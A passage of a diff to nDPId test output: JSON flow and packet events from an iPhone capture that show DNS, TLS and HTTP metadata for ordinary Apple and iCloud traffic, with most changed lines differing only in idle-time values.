cloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmf
mobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454598544,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598544,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysAAAFAslesym7UszoAQCBZUCQAAAQEIChHf5+gdNCSF"} +00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1582454598545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZFvAqAIREYICLsWRAbsZOusY368Fo4AQBAtqWAAAAQEIChHf5\/C1T9He"} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWTAbsyJO8WaVjUYYAQBAtTNAAAAQEIChHf5\/cAH8DD"} 
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWSAbt\/OqmN8vqp6oAQBAt5ywAAAQEIChHf5\/eK\/qiV"} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.icloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmf
mobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454598582,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1582454598582,"pkt":"xGGLNYKpxiwDYGpkCABFAADmpdwAAEARTsjAqAIBwKgCEQA1znQA0sdAsQ+BgAABAAkAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAaB2dhdGV3YXkCZmUJYXBwbGUtZG5zA25ldADAMAABAAEAAAAiAAQR+LBLwDAAAQABAAAAIgAEEfixhcAwAAEAAQAAACIABBH4sCjAMAABAAEAAAAiAAQR+LCNwDAAAQABAAAAIgAEEfiwTcAwAAEAAQAAACIABBH4sWXAMAABAAEAAAAiAAQR+LGqwDAAAQABAAAAIgAEEfiwiQ=="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598582,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.176.75"}} 
-00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598587,"flow_last_seen":1582454598587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598587,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454598587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598587,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WUAbuGKOrDAAAAALDC\/\/9\/HgAAAgQFtAEDAwcBAQgKEd\/oBAAAAAAEAgAA"} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01251{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, 
OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454598621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598621,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZQAd9VghijqxKBScSDqGQAAAgQFrAEBCApbEwd4Ed\/oBAEDAwU="} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598587,"flow_last_seen":1582454598587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598587,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454598587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598587,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WUAbuGKOrDAAAAALDC\/\/9\/HgAAAgQFtAEDAwcBAQgKEd\/oBAAAAAAEAgAA"} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01251{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454598621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598621,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZQAd9VghijqxKBScSDqGQAAAgQFrAEBCApbEwd4Ed\/oBAEDAwU="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAAA8BIgAAP8RMcbAqAIRwKgCAc3KADUAKGCiwekBAAABAAAAAAAAA3d3dwZpY2xvdWQDY29tAAABAAE="} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
